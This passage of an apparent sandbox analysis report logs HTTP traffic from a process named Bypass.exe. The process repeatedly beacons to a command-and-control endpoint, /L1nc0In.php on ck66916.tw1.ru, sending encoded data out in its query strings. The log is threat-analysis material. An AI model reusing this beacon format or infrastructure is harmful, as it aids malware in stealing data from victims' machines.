zaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:49.637916088 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:54.652283907 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:55.365262032 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:00.386689901 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:01.087023973 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:06.105329037 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:55:06.796613932 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49760	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:11.808259964 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:12.501444101 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:17.511843920 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:55:18.221051931 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49762	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:23.353847027 CEST	2220	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:24.045906067 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:29.058640003 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:55:29.763211966 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49764	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:34.777014017 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:35.485198021 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49765	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:40.495696068 CEST	2223	OUT	GET 